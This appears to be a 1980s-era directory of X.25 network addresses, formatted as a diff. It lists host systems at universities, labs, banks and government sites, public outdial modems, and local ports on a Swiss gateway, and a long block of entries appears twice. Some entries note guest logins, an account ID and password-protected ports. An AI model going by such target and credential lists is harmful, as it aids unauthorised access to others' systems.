+  0310 600 759 6                   (Host)  A - VM/370, B - VM/370
+? 0310 600 787                     Dallas
+  0310 601 79                      Berkley Univ.
+  0310 602 88                      Stanford Research Institute
+B 0310 611 467                     Cas Online Sys.
+  0310 614 67                      Ohio CAS (Chemical Abstracts Service)
+  0310 617 001 38                  Multics
+  0310 647 911 065                 BIX Lexington Data Service
+  0310 690 006 1*D      DIALOG4    Lockheed DIALOG service
+B 0310 690 080 3*D      DIALOG3    Lockheed DIALOG service
+  0310 690 762 6                   Emery ADO
+  0311 0                TELENET    USA - Telenet
+B 0311 002 130 0039                ECLD
+  0311 020 100 02000               Insco Systems
+  0311 020 100 022                 New Jersey Outdial 2400 bps (Area 201)
+  0311 020 100 02300               American Information Services
+  0311 020 100 02400               The Information Bank
+  0311 020 100 02500               New Jersey Institute of Technology
+  0311 020 100 02800               Olcott International Company
+  0311 020 100 03700               Informatics Inc
+  0311 020 100 169      MOUTON
+  0311 020 100 301                 New Jersey Outdial 1200 bps (Area 201)
+  0311 020 101 59200               Scientific Process & Research Inc
+  0311 020 200 02100               Scientific Timesharing
+  0311 020 200 02200               Scientific Timesharing
+X 0311 020 200 066                 Air Force
+T 0311 020 200 099      ICIB       Information Council Incorporated B system
+  0311 020 200 1        TELEMAIL   US Telemail facility
+X 0311 020 200 10900    CIS        Chemical Information Systems
+A 0311 020 200 115                 Outdial 300 bps (Area 202)
+A 0311 020 200 116                 Outdial 1200 bps (Area 202)
+  0311 020 200 117                 Distr. of Columbia Outdial 2400 bps (Area
+                                   202)
+B 0311 020 200 141      TELEMAIL   US Telemail facility (GT-Net)
+  0311 020 200 14175    TELEENQ    Telenet Enquiry Service
+  0311 020 200 14175    TELEMAIL1  US Telemail facility
+  0311 020 200 14275    TELENET    US Telenet
+  0311 020 201 19500               Gallaude College Computer Centre
+  0311 020 300 06400               NCSS Bureau
+  0311 020 300 130                 Connecticut Outdial 1200 bps (Area 203)
+  0311 020 301 78900               Yale University Computer Centre
+  0311 020 400 02900    WATERLO    University of Waterloo
+  0311 020 600 019                 Washington Outdial 1200 bps (Area 206)
+  0311 021 200 02000               Bowne Timesharing
+  0311 021 200 02500               Interactive Market Systems (Anistics)
+  0311 021 200 02800               Burroughs Corp (NYC data centre)
+  0311 021 200 141      JPLM1      Jet Propulsion Laboratory mail 1, USA
+  0311 021 200 142      JPLM2      Jet Propulsion Laboratory mail 2, USA
+  0311 021 200 14200               GT-Net Telemail
+A 0311 021 200 315                 Outdial 300 bps (Area 212)
+A 0311 021 200 316                 Outdial 1200 bps (Area 212)
+D 0311 021 200 412                 Outdial 2400 bps (Area 212)
+D 0311 021 200 41200               New York City Outdial (Area 212)
+  0311 021 201 39200               Memorial Dose Distribution Computation
+                                   Service
+  0311 021 201 40600               MAV Systems (300 bps)
+  0311 021 201 57800               IP Sharp Associates
+  0311 021 201 58000               SDL International (1200 bps)
+  0311 021 201 58500               SDL International (300 bps)
+  0311 021 201 58800               DSL Systems Inc
+  0311 021 201 59500               SDL International (1200 bps)
+  0311 021 201 62000               Telestat System Inc
+  0311 021 201 62700               Telestat Systems Inc
+  0311 021 300 02200               Interactive Systems Corporation
+  0311 021 300 02700               Mellonics Information Centre
+  0311 021 300 029                 TRW Defence & Space Systems Group
+B 0311 021 300 03300    ORBIT      Orbit
+  0311 021 300 03300*D  ORBIT      SDC Search Service (300 bps)
+  0311 021 300 04400               SDC Search Service (1200 bps)
+B 0311 021 300 039      USCAL2     Univ. of Southern California
+  0311 021 300 04114    IHW        IHW
+  0311 021 300 04700               University of Southern California
+B 0311 021 300 048      USCAL1     University of Southern California
+B 0311 021 300 170                 LRS Dialog 2
+T 0311 021 300 17000    DIALOG5    Lockheed Info Systems
+  0311 021 300 17000*D  DIALOG2    Lockheed DIALOG service
+B 0311 021 300 219      CALTECH    Caltech VAX 11/780
+  0311 021 300 21908    CALTECH    Caltech VAX 11/780
+  0311 021 300 21909    CALTECH2   Caltech VAX 11/780
+  0311 021 300 412                 California Outdial 1200 bps (Area 213)
+A 0311 021 300 413                 Outdial CA
+  0311 021 300 668                 Adainfo
+  0311 021 301 353      UCLA       UCLA, USA
+  0311 021 301 40300               Marshall & Swift Publication
+  0311 021 400 117                 Outdial 300 bps (Area 214)
+A 0311 021 400 118                 Texas Outdial 1200 bps (Area 214)
+  0311 021 500 022                 Pennsylvania Outdial 2400 bps (Area 215)
+  0311 021 500 112                 Pennsylvania Outdial 1200 bps (Area 215)
+A 0311 021 600 020                 Outdial 300 bps (Area 216)
+A 0311 021 600 021                 Ohio Outdial 1200 bps (Area 216)
+  0311 021 700 021                 University of Illinois - Urbana
+  0311 030 100 02000    NLM        National Library of Medicine
+A 0311 030 100 02400               The Source
+B 0311 030 100 038                 The Source (ID BSC131 SR3811)
+B 0311 030 100 243                 ITT Dialcom
+  0311 030 100 364                 Primesoft
+A 0311 030 100 38                  The Source
+B 0311 030 100 633                 Toxnet (NLM)
+  0311 030 101 26500               Informatics Inc
+  0311 030 300 02000               Computer Sharing Services
+  0311 030 300 021                 Colorado Outdial 2400 bps (Area 303)
+  0311 030 300 02300               Broker Services Inc
+  0311 030 300 115                 Colorado Outdial 1200 bps (Area 303)
+  0311 030 301 13100               EDI Computer Services
+  0311 030 301 13200               EDI Computer Services
+  0311 030 301 13300               Energy Enterprises
+  0311 030 500 121                 Florida Outdial 1200 bps (Area 305)
+  0311 030 501 16300               Florida Computer Inc
+D 0311 030 508 793                 Miami Outdial (Area 305) ?
+  0311 031 200 02200               National Computer Network of Chicago
+  0311 031 200 024                 Illinois Outdial 2400 bps (Area 217 ?)
+  0311 031 200 03100               Continental Bank
+  0311 031 200 03200               Continental Bank
+  0311 031 200 04900               American Hospital Supply Corporation
+  0311 031 200 411                 Illinois Outdial 1200 bps (Area 217 ?)
+  0311 031 201 07300               Commodity Information Services
+  0311 031 268 801      ADPUSA     ADP Network Services Ltd.
+  0311 031 300 024                 Michigan Outdial 2400 bps (Area 313)
+  0311 031 300 04000               ADP Network Services
+  0311 031 300 06200               Merit International (MIT)
+  0311 031 300 216                 Michigan Outdial 1200 bps (Area 313)
+  0311 031 301 39800               Merit Computer
+  0311 031 400 07200               Environmental DataNetwork Inc.
+  0311 031 401 06500               McDonnel Douglas Automation (300 bps)
+  0311 031 401 06600               McDonnel Douglas Automation (110 bps)
+  0311 031 401 06700               McDonnel Douglas Automation (1200 bps)
+  0311 031 401 61000               McDonnel Douglas Automation (300 bps)
+  0311 031 500 02000               Bibliographic Retrieval Services
+A 0311 040 100 612                 Modemcity
+A 0311 040 400 114                 Georgia Outdial 1200 bps (Area 404)
+A 0311 040 800 021                 California Outdial 1200 bps? (Area 408)
+  0311 040 800 245                 Bridge
+B 0311 040 800 246                 SCF
+  0311 041 201 4600                On-Line Systems Inc
+  0311 041 400 02000               A.O. Smith Data Systems Divisions
+  0311 041 400 021                 Wisconsin Outdial 1200 bps (Area 414)
+B 0311 041 500 020                 LRS-Dialog 2
+A 0311 041 500 02000    DIALOG     Lockheed Information Systems
+  0311 041 500 02000*D  DIALOG     Lockheed DIALOG service
+B 0311 041 500 048                 LRS Dialog 2
+  0311 041 500 04800    DIALOG2    Lockheed Information Systems 2
+  0311 041 500 04800*D  DIALOG1    Lockheed DIALOG service
+  0311 041 500 117                 California Outdial 1200 bps (Area 415)
+I 0311 041 500 210                 Outdial USA
+A 0311 041 500 215                 Outdial (Area 415)
+A 0311 041 500 217                 Outdial (Area 415)
+A 0311 041 500 220                 Outdial 1200 bps (Area 415)
+  0311 041 500 48000               Lockheed Information Systems (?)
+B 0311 041 500 607                 BIONET
+B 0311 041 500 609                 INTELLIGENETICS
+  0311 041 501 23600               Hydrocomp Inc (300 bps)
+  0311 041 501 23700               Hydrocomp Inc (1200 bps)
+  0311 041 501 26800               ITEL Corp (300 bps)
+  0311 041 501 26900               ITEL Corp (1200 bps)
+  0311 041 501 59700               Stanford Library Centre for Inform
+                                   Processing
+  0311 041 501 59700               Standard Centre for Information Processing
+O 0311 050 006 1                   Nuclear Research
+A 0311 050 300 020                 Outdial 300 bps (Area 503)
+A 0311 050 300 021                 Oregon Outdial 1200 bps (Area 503)
+B 0311 050 500 060                 ICN (=LASL)
+  0310 600 021 0                   Procter and Gamble
+  0310 600 022 6                   Anistics
+  0310 600 022 6                   Interactive Market Systems (Anistics)
+  0310 600 023 2                   Scientific Timesharing
+  0310 600 024 2                   Timesharing Resources
+  0310 600 025 2                   Computer Science Corporation
+  0310 600 025 5                   Timesharing Associates
+  0310 600 027 6                   Management Decision Systems Inc
+  0310 600 028 8                   SRI
+  0310 600 028 8                   SRI San Francisco (UNIX)
+  0310 600 028 8                   Stanford Research Institute (SRI)
+  0310 600 030 3                   Scientific Timesharing
+  0310 600 030 7                   Infomedia Corporation
+  0310 600 032 3                   TRW Defence & Space Systems Group
+  0310 600 040 1                   TMCS Public Network
+  0310 600 043 2                   Interactive Market Systems
+  0310 600 046 6                   Bibliographic Retrieval Services
+B 0310 600 058 1                   BRS
+  0310 600 063 3                   Public TYMNET/TRWNET Interlink
+  0310 600 079 3                   J&J Host
+B 0310 600 105 3
+  0310 600 133 0                   MULTICS, HVN 862-3642
+  0310 600 140 0                   TMCS Public Network
+B 0310 600 150 9                   Orbit (SDC)
+B 0310 600 157 878                 BIX
+D 0310 600 165 9                   BYTE Information Exchange (GUEST,GUEST)
+A 0310 600 166 3                   People Link
+  0310 600 181 9                   TMCS Public Network
+  0310 600 182 8        FRX        Faifax Outdial Host (Tymnet)
+  0310 600 186 4                   SUNGARDS Central Computer Facility Networks
+  0310 600 189 2                   Primenet (certain hours)
+B 0310 600 195 2                   VAX
+B 0310 600 197 6                   Outdial NY
+A 0310 600 197 7
+  0310 600 209 5                   COMODEX Online System
+  0310 600 209 8                   D & B
+  0310 600 209 9                   D & B
+  0310 600 210 0                   D & B
+  0310 600 210 9                   TYMNET/15B (inter-link)
+B 0310 600 220 7,OUT               Outdial
+  0310 600 228 6                   Primenet TFGI
+  0310 600 229 9                   CONSILIUM
+  0310 600 232 901*D    MFE        Magnetic Fusion Energy Centre, Lawrence
+                                   Livermore
+B 0310 600 236 1                   Denver Oil&Gas
+  0310 600 241                     Bank Of America
+  0310 600 245 3                   Primenet
+B 0310 600 254 5        SEISMO     Centre for Seismic Studies
+B 0310 600 255                     Outdial NY
+A 0310 600 262 3                   VAX/VMS (GUEST ???)
+B 0310 600 262 3003                VTINET
+B 0310 600 262 460                 SUMEX
+B 0310 600 263 5                   QUOTRON Wall Street (Boerse n.y.)
+B 0310 600 266 400      SLAC       SLAC on Tymnet
+B 0310 600 267 7                   The New York Times
+  0310 600 269 4                   PVM3101,SPDS/MTAM, MLCM,VM/SP,STRATUS-1,
+                                   STRATUS-2
+  0310 600 279 0                   VM/370
+  0310 600 286 4                   RCA Semicustom
+B 0310 600 302 70000               VTI NETONE
+  0310 600 307 9                   VM/370
+  0310 600 309 2                   TYMNET/Protected Access Service Sys.
+                                   Inter-link
+  0310 600 316 8                   VM/370
+  0310 600 321 4                   VM/370
+  0310 600 322 0                   VM/370
+  0310 600 322 1                   VM/370
+  0310 600 357 2                   NORTH AMERICA DATA CENTRE
+  0310 600 360 4                   VM/370
+  0310 600 404 1                   RCA GLOBCOM'S PACKET SWITCHING SERICE
+A 0310 600 412 9                   ?
+A 0310 600 413 1                   ?
+  0310 600 413 7                   TSO, VM/370
+  0310 600 416 300                 Oakridge, Tennessee
+  0310 600 417 4                   VM/370
+  0310 600 420 6                   MAINSTREAMS
+  0310 600 423 500                 Oakridge, Tennessee
+B 0310 600 430 5                   BIOVAX
+  0310 600 434 1                   (Host) 2 - VM/370, T - VM/370,1,3,4,A,C,E,Z
+A 0310 600 436 5                   Toxnet (NLM=National Lib. of Medicine's)
+B 0310 600 455 5                   VAX
+  0310 600 459 97
+  0310 600 474 3                   TYMNET Info Service
+X 0310 600 502 0                   Outdial Fairfax
+  0310 600 522 9                   Uni.of Pencilvania School of Arts and
+                                   Science
+  0310 600 526 7                   CHANEL 01
+X 0310 600 531 7                   Outdial St.Louis
+B 0310 600 532 0                   DEC Soft. Serv.
+  0310 600 556 9                   STRATUS/32
+  0310 600 557 1                   STRATUS/32
+  0310 600 560 3                   (Host) systems 1,2,3,4,5,C (5=Outdial)
+B 0310 600 562 200      FNAL       Fermilab
+B 0310 600 562 226                 Fermilab 2
+B 0310 600 578 78                  BIX
+B 0310 600 584 401                 Washington Post
+B 0310 600 61           DIALOG1    Lockheed Info Systems
+  0310 600 61*DSDDIPSSL ORBIT2     SDC Search Service
+  0310 600 628 1                   EDCS
+  0310 600 628 3                   EDCS
+  0310 600 643 2                   EASYLINK
+  0310 600 643 4                   EASYLINK
+  0310 600 672 2                   International Network
+  0310 600 68                      Stanford SUMEX-AIM. Tenex op syst.
+  0310 600 683 2                   A&A DATANET (Systems 1,8,0,14)
+X 0310 600 701 7                   Outdial NY
+  0310 600 759 6                   (Host)  A - VM/370, B - VM/370
+? 0310 600 787                     Dallas
+  0310 601 79                      Berkley Univ.
+  0310 602 88                      Stanford Research Institute
+B 0310 611 467                     Cas Online Sys.
+  0310 614 67                      Ohio CAS (Chemical Abstracts Service)
+  0310 617 001 38                  Multics
+  0310 647 911 065                 BIX Lexington Data Service
+  0310 690 006 1*D      DIALOG4    Lockheed DIALOG service
+B 0310 690 080 3*D      DIALOG3    Lockheed DIALOG service
+  0310 690 762 6                   Emery ADO
+  0311 0                TELENET    USA - Telenet
+B 0311 002 130 0039                ECLD
+  0311 020 100 02000               Insco Systems
+  0311 020 100 022                 New Jersey Outdial 2400 bps (Area 201)
+  0311 020 100 02300               American Information Services
+  0311 020 100 02400               The Information Bank
+  0311 020 100 02500               New Jersey Institute of Technology
+  0311 020 100 02800               Olcott International Company
+  0311 020 100 03700               Informatics Inc
+  0311 020 100 169      MOUTON
+  0311 020 100 301                 New Jersey Outdial 1200 bps (Area 201)
+  0311 020 101 59200               Scientific Process & Research Inc
+  0311 020 200 02100               Scientific Timesharing
+  0311 020 200 02200               Scientific Timesharing
+X 0311 020 200 066                 Air Force
+T 0311 020 200 099      ICIB       Information Council Incorporated B system
+  0311 020 200 1        TELEMAIL   US Telemail facility
+X 0311 020 200 10900    CIS        Chemical Information Systems
+A 0311 020 200 115                 Outdial 300 bps (Area 202)
+A 0311 020 200 116                 Outdial 1200 bps (Area 202)
+  0311 020 200 117                 Distr. of Columbia Outdial 2400 bps (Area
+                                   202)
+B 0311 020 200 141      TELEMAIL   US Telemail facility (GT-Net)
+  0311 020 200 14175    TELEENQ    Telenet Enquiry Service
+  0311 020 200 14175    TELEMAIL1  US Telemail facility
+  0311 020 200 14275    TELENET    US Telenet
+  0311 020 201 19500               Gallaude College Computer Centre
+  0311 020 300 06400               NCSS Bureau
+  0311 020 300 130                 Connecticut Outdial 1200 bps (Area 203)
+  0311 020 301 78900               Yale University Computer Centre
+  0311 020 400 02900    WATERLO    University of Waterloo
+  0311 020 600 019                 Washington Outdial 1200 bps (Area 206)
+  0311 021 200 02000               Bowne Timesharing
+  0311 021 200 02500               Interactive Market Systems (Anistics)
+  0311 021 200 02800               Burroughs Corp (NYC data centre)
+  0311 021 200 141      JPLM1      Jet Propulsion Laboratory mail 1, USA
+  0311 021 200 142      JPLM2      Jet Propulsion Laboratory mail 2, USA
+  0311 021 200 14200               GT-Net Telemail
+A 0311 021 200 315                 Outdial 300 bps (Area 212)
+A 0311 021 200 316                 Outdial 1200 bps (Area 212)
+D 0311 021 200 412                 Outdial 2400 bps (Area 212)
+D 0311 021 200 41200               New York City Outdial (Area 212)
+  0311 021 201 39200               Memorial Dose Distribution Computation
+                                   Service
+  0311 021 201 40600               MAV Systems (300 bps)
+  0311 021 201 57800               IP Sharp Associates
+  0311 021 201 58000               SDL International (1200 bps)
+  0311 021 201 58500               SDL International (300 bps)
+  0311 021 201 58800               DSL Systems Inc
+  0311 021 201 59500               SDL International (1200 bps)
+  0311 021 201 62000               Telestat System Inc
+  0311 021 201 62700               Telestat Systems Inc
+  0311 021 300 02200               Interactive Systems Corporation
+  0311 021 300 02700               Mellonics Information Centre
+  0311 021 300 029                 TRW Defence & Space Systems Group
+B 0311 021 300 03300    ORBIT      Orbit
+  0311 021 300 03300*D  ORBIT      SDC Search Service (300 bps)
+  0311 021 300 04400               SDC Search Service (1200 bps)
+B 0311 021 300 039      USCAL2     Univ. of Southern California
+  0311 021 300 04114    IHW        IHW
+  0311 021 300 04700               University of Southern California
+B 0311 021 300 048      USCAL1     University of Southern California
+B 0311 021 300 170                 LRS Dialog 2
+T 0311 021 300 17000    DIALOG5    Lockheed Info Systems
+  0311 021 300 17000*D  DIALOG2    Lockheed DIALOG service
+B 0311 021 300 219      CALTECH    Caltech VAX 11/780
+  0311 021 300 21908    CALTECH    Caltech VAX 11/780
+  0311 021 300 21909    CALTECH2   Caltech VAX 11/780
+  0311 021 300 412                 California Outdial 1200 bps (Area 213)
+A 0311 021 300 413                 Outdial CA
+  0311 021 300 668                 Adainfo
+  0311 021 301 353      UCLA       UCLA, USA
+  0311 021 301 40300               Marshall & Swift Publication
+  0311 021 400 117                 Outdial 300 bps (Area 214)
+A 0311 021 400 118                 Texas Outdial 1200 bps (Area 214)
+  0311 021 500 022                 Pennsylvania Outdial 2400 bps (Area 215)
+  0311 021 500 112                 Pennsylvania Outdial 1200 bps (Area 215)
+A 0311 021 600 020                 Outdial 300 bps (Area 216)
+A 0311 021 600 021                 Ohio Outdial 1200 bps (Area 216)
+  0311 021 700 021                 University of Illinois - Urbana
+  0311 030 100 02000    NLM        National Library of Medicine
+A 0311 030 100 02400               The Source
+B 0311 030 100 038                 The Source (ID BSC131 SR3811)
+B 0311 030 100 243                 ITT Dialcom
+  0311 030 100 364                 Primesoft
+A 0311 030 100 38                  The Source
+B 0311 030 100 633                 Toxnet (NLM)
+  0311 030 101 26500               Informatics Inc
+  0311 030 300 02000               Computer Sharing Services
+  0311 030 300 021                 Colorado Outdial 2400 bps (Area 303)
+  0311 030 300 02300               Broker Services Inc
+  0311 030 300 115                 Colorado Outdial 1200 bps (Area 303)
+  0311 030 301 13100               EDI Computer Services
+  0311 030 301 13200               EDI Computer Services
+  0311 030 301 13300               Energy Enterprises
+  0311 030 500 121                 Florida Outdial 1200 bps (Area 305)
+  0311 030 501 16300               Florida Computer Inc
+D 0311 030 508 793                 Miami Outdial (Area 305) ?
+  0311 031 200 02200               National Computer Network of Chicago
+  0311 031 200 024                 Illinois Outdial 2400 bps (Area 217 ?)
+  0311 031 200 03100               Continental Bank
+  0311 031 200 03200               Continental Bank
+  0311 031 200 04900               American Hospital Supply Corporation
+  0311 031 200 411                 Illinois Outdial 1200 bps (Area 217 ?)
+  0311 031 201 07300               Commodity Information Services
+  0311 031 268 801      ADPUSA     ADP Network Services Ltd.
+  0311 031 300 024                 Michigan Outdial 2400 bps (Area 313)
+  0311 031 300 04000               ADP Network Services
+  0311 031 300 06200               Merit International (MIT)
+  0311 031 300 216                 Michigan Outdial 1200 bps (Area 313)
+  0311 031 301 39800               Merit Computer
+  0311 031 400 07200               Environmental DataNetwork Inc.
+  0311 031 401 06500               McDonnel Douglas Automation (300 bps)
+  0311 031 401 06600               McDonnel Douglas Automation (110 bps)
+  0311 031 401 06700               McDonnel Douglas Automation (1200 bps)
+  0311 031 401 61000               McDonnel Douglas Automation (300 bps)
+  0311 031 500 02000               Bibliographic Retrieval Services
+A 0311 040 100 612                 Modemcity
+A 0311 040 400 114                 Georgia Outdial 1200 bps (Area 404)
+A 0311 040 800 021                 California Outdial 1200 bps? (Area 408)
+  0311 040 800 245                 Bridge
+B 0311 040 800 246                 SCF
+  0311 041 201 4600                On-Line Systems Inc
+  0311 041 400 02000               A.O. Smith Data Systems Divisions
+  0311 041 400 021                 Wisconsin Outdial 1200 bps (Area 414)
+B 0311 041 500 020                 LRS-Dialog 2
+A 0311 041 500 02000    DIALOG     Lockheed Information Systems
+  0311 041 500 02000*D  DIALOG     Lockheed DIALOG service
+B 0311 041 500 048                 LRS Dialog 2
+  0311 041 500 04800    DIALOG2    Lockheed Information Systems 2
+  0311 041 500 04800*D  DIALOG1    Lockheed DIALOG service
+  0311 041 500 117                 California Outdial 1200 bps (Area 415)
+I 0311 041 500 210                 Outdial USA
+A 0311 041 500 215                 Outdial (Area 415)
+A 0311 041 500 217                 Outdial (Area 415)
+A 0311 041 500 220                 Outdial 1200 bps (Area 415)
+  0311 041 500 48000               Lockheed Information Systems (?)
+B 0311 041 500 607                 BIONET
+B 0311 041 500 609                 INTELLIGENETICS
+  0311 041 501 23600               Hydrocomp Inc (300 bps)
+  0311 041 501 23700               Hydrocomp Inc (1200 bps)
+  0311 041 501 26800               ITEL Corp (300 bps)
+  0311 041 501 26900               ITEL Corp (1200 bps)
+  0311 041 501 59700               Stanford Library Centre for Inform
+                                   Processing
+  0311 041 501 59700               Standard Centre for Information Processing
+O 0311 050 006 1                   Nuclear Research
+A 0311 050 300 020                 Outdial 300 bps (Area 503)
+A 0311 050 300 021                 Oregon Outdial 1200 bps (Area 503)
+B 0311 050 500 060                 ICN (=LASL)
+B 0311 051 300 03000               Mead Data Central
+  0311 051 501 39600               State University of New York
+  0311 051 600 02200               Timesharing Resources
+D 0311 060 200 020                 Outdial 300 bps (Area 602)
+D 0311 060 200 021                 Outdial 1200 bps (Area 602)
+B 0311 060 200 150                 Phoenix
+  0311 060 201 60900               Timesharing Associates
+B 0311 060 300 020                 Dartmouth College
+  0311 060 300 02000    DARTMTH    Dartmouth College, USA
+  0311 060 300 05000               Corporate Timesharing
+  0311 060 301 54700               Raytheon Company Scientific Computer
+                                   Service
+X 0311 060 700 02000    CORNELL0   Cornell University (134.5 bps)
+T 0311 060 700 02100    CORNELL1   Cornell University (300 bps)
+T 0311 060 700 02200    CORNELL2   Cornell University (1200 bps)
+  0311 060 700 02300    CORNELL3   Cornell University (1200 bps)
+  0311 060 700 03600               TIPO Computer
+  0311 060 702 00       CORNELL2   Cornell University
+  0311 060 702 00       CORNELL2   Cornell University
+  0311 060 800 02500               University of Wisconsin
+  0311 060 801 6630                University of Wisconsin
+  0311 060 900 4200                Dow-Jones
+  0311 061 200 02500               Honeywell Inform Services Datanetwork
+  0311 061 200 02700               Honeywell Inform Services Datanetwork
+  0311 061 200 121                 Minnesota Outdial 1200 bps (Area 612)
+  0311 061 201 06500               Honeywell Inform Services Datanetwork,
+                                   300 bps
+  0311 061 201 06500               Honeywell Inform Services Datanetwork
+  0311 061 201 06600               Honeywell Inform Services Datanetwork,
+                                   110 bps
+  0311 061 201 06700               Honeywell Inform Services Datanetwork,
+                                   300 bps
+  0311 061 201 06900               Honeywell Inform Services Datanetwork,
+                                   134 bps
+B 0311 061 400 021                 CAS online
+D 0311 061 400 02124    CASUSA     STN International
+  0311 061 700 02000               Bolt Beranek & Newman
+  0311 061 700 02300               Computer Corporation    of America
+  0311 061 700 02400               AVCO Computer Services
+  0311 061 700 03600               Data Resources Inc
+  0311 061 700 03800               BBN-RCC
+  0311 061 700 03800               Bolt Beranek & Newman
+  0311 061 700 06700               Management Decision Systems Inc
+  0311 061 700 07000               Interactive Science Corp
+  0311 061 700 07600               Interactive Science Corp
+  0311 061 700 08000               III Systems Inc
+B 0311 061 700 08401               LCG
+  0311 061 700 12000               Cullinane Corp
+  0311 061 700 13700               Masachusetts Institute of Technology
+  0311 061 700 13800               Masachusetts Institute of Technology
+  0311 061 700 13900               Masachusetts Institute of Technology
+  0311 061 700 14000               Masachusetts Institute of Technology
+B 0311 061 700 270                 Waltham
+B 0311 061 700 609                 Package
+B 0311 061 700 613                 BBN10
+B 0311 061 700 614                 BBNVAX
+  0311 061 701 01600               Data Resources Inc (300 bps)
+  0311 061 701 01900               Data Resources Inc (300 bps)
+  0311 061 701 16100               First Data Division/ADP Inc
+  0311 061 701 16200               First Data Division/ADP Inc
+  0311 061 701 25800               Data Resources Inc (134.5 bps)
+  0311 061 701 26900               Interactive Management Systems
+  0311 061 701 27500               Masachusetts Institute of Technology
+  0311 061 701 39000               Masachusetts Institute of Technology
+  0311 061 701 40300               Masachusetts Institute of Technology
+  0311 061 703 088                 Delphi
+  0311 061 900 050                 California Outdial 1200 bps (Area 619)
+  0311 070 300 02000               Litton Computer Services
+  0311 070 300 02100               American Management Systems
+  0311 070 300 056                 PRC Computer Centre Inc
+  0311 070 300 117                 Virginia Outdial 2400 bps (Area 703)
+B 0311 070 300 50000               NIH-EPA (CIS)
+  0311 070 305 05200               Digital Broadcasting Corporation
+  0311 071 300 024                 Texas Outdial 2400 bps (Area 713)
+  0311 071 300 114                 Texas Outdial 1200 bps (Area 713)
+  0311 071 301 08300               Corporate Services Inc
+  0311 071 301 56500               Rice University
+  0311 071 400 02000    SCIAPP     Science Applications Inc.
+  0311 071 401 13700               Engineering Supervision Co
+  0311 071 700 02000               Brodart Inc
+A 0311 080 100 020                 Outdial 300 bps (Area 801)
+A 0311 080 100 021                 Utah Outdial 1200 bps (Area 801)
+B 0311 080 100 054                 ES
+  0311 080 101 13700               Environmentech Information Systems
+  0311 080 400 02000               Multiple Access Computer Group
+X 0311 080 800 01046    UKIRTUK    Infra Red Telescope in Hawaii
+X 0311 080 800 040      UKIRT      UK Infra Red Telescope in Hawaii
+A 0311 081 300 020                 Outdial 300 bps (Area 813)
+A 0311 081 300 021                 Florida Outdial 1200 bps (Area 813)
+D 0311 081 305 518                 Tampa Outdial (Area 813) ?
+  0311 081 800 021                 California Outdial 1200 bps (Area 818)
+D 0311 090 900 80000   JPLM3      Jet Propulsion Laboratory mail 2, USA
+  0311 090 900 8100                Telemail
+  0311 091 400 02200               Electronic Tabulating Corporation
+  0311 091 600 050                 California Outdial 1200 bps (Area 916)
+A 0311 091 900 020                 Outdial 300 bps (Area 919)
+A 0311 091 900 021                 Outdial 1200 bps (Area 919)
+  0311 3                RCA        USA - RCA (RCAG)
+  0311 9                           USA - TRT
+  0312 4                           USA - FTCC
+  0312 5                           USA - Uninet
+  0312 521 210 1        DIALOG6    Lockheed Info Systems
+D 0312 561 703 080                 UNINET
+B 0312 561 703 088                 Delphi
+  0312 6                AUTONET    USA - Autonet
+  0312 688 01           AUTONET    AUTONET Information
+  0312 7                           USA - Telenet
+  0313 2                COMPU      USA - Compuserve
+  0313 6                           USA - Geisco
+  0334                             Mexico
+  0334 0                           Telepac
+  0340                  FA         French Antilles (Martinique (Curacau?))
+  0340 0                           Dompac/NTI
+  0342                  BDS        Barbados
+  0342 235 191 9169
+  0350                             Bermuda
+  0350 3                           PSDS
+  0425                  IL         Israel
+  0425 1                           Isranet
+B 0425 130 000 215                 Israelbox
+  0426                  BRN        Bahrain
+  0426 3                           BTC
+  0431                  DXB        United Arab Emirates - Dubai
+  0440                  J          Japan
+  0440 1                           DDX-P
+B 0440 129 431 04                  KEK VAX
+B 0440 129 431 21                  Tsukuba Uni
+  0440 8                VENUSP     Venus-P (Japanese data network)
+I 0440 820 023                     KDD ?
+B 0440 820 060 01       KDD        KDD Test Host, TOKYO
+  0442
+B 0442 110 403 25                  OKI
+B 0442 433 403 07                  CMES
+  0450                             South Korea
+  0450 1                           Dacom/DNS
+  0454                  HK         Hong Kong
+  0454 2                           Intelpak
+  0454 5                           Datapak
+A 0454 550 010 4        HKDATA     Hong Kong DATAPAK Info
+A 0454 550 043 1                   DATAFAX
+  0487                             Taiwan
+  0487 2                           Pacnet
+  0487 7                           Udas
+  0505                  AUS        Australia
+  0505 2                           Austpac
+  0505 228 621 000                 Anglo/Australian Observatory
+  0505 228 621 001                 CSIRO Radio-Physics
+  0505 228 621 001                 FTP for Epping
+  0505 233 422 000      MELBUNI    Melbourne Univ. Australia
+A 0505 273 720 000      UQ         Univ. of Queensland Australia
+A 0505 273 720 000      UQXA       University of Queensland ANF-10 gateway
+D 0505 273 722 0000                Uni Queensland
+  0505 282 620 000                 FTP For Austek
+A 0505 282 620 000                 VAX in Sidney, Australia
+  0505 3                           Midas
+  0505 321 000 1                   Network test
+  0505 321 000 3                   MIDAS FOX Test
+  0510                             Indonesia
+  0510 1                           PSDS (1986)
+  0525                  SGP        Singapore
+  0525 2                           Telepac
+A 0525 211 668 8        TELEPAC    Telepac Info
+  0530                  NZ         New Zealand
+  0530 1                           P.S.S. (Pacnet)
+  0530 171 000 004      WAIKATO    Univ of Waikato New Zealand
+B 0530 197 000 016                 ASMAIL
+  0547                             Fr.Polyn.
+  0547 0                           Tompac
+  0612                             Ivory Coast
+  0612 2                           Sytranpac
+  0647                             Reunion
+  0647 0                           Dompac/NIT
+  0655                  ZA         South Africe
+  0655 0                           Saponet
+D 0655 011 101 207                 UNI-NET
+  0714                             Panama
+  0714 1                           Intelpac
+  0722                             Argentinia
+  0722 2                           Arpac
+I 0722 221 110 0171
+  0724                  BR         Brazil
+  0724 0                           Interdata
+  0724 1                           Renpac
+D 0724 782 450 8                   Nuclear Research Institute
+  0730                             Chile
+  0730 0                           Entel
+  0732                             Colombia
+  0732 0
+  0742                             French Guiana
+  0742 0                           Dompac/NTI
+  0900                             USA ?
+  0900 0                           Dialnet
+
+==============================================================================
+|
+| Local addresses on KOMETH (0228 479 110 86):
+|
+|   11  KOMETH-Informations
+|  120  Modems 1200 bps (predefined numbers, some with a PW)
+|  124  Modems 2400 bps (     "        "   ,  "   "    a PW)
+|  130  Modems 300 bps  (     "        "   ,  "   "    a PW)
+|  1D0  RZ-VAX (EZRZ1)
+|  300  ETZ-VAX (CUMULI)
+|  520  ETHICS, Library database
+|  D11  PSI-Informations
+| C000  Time
+| C025  X25 Gateway (RZU, with password)
+| C011  NUZ-Informations
+| C100  RZU, VM/SP, full-screen
+|
+| There are two information systems on the RZ-VAX:
+|
+|  MAC-BBS  BBS with Mac-specific informations. Access for validated users
+|           only (that means that you have to type in your name, address and
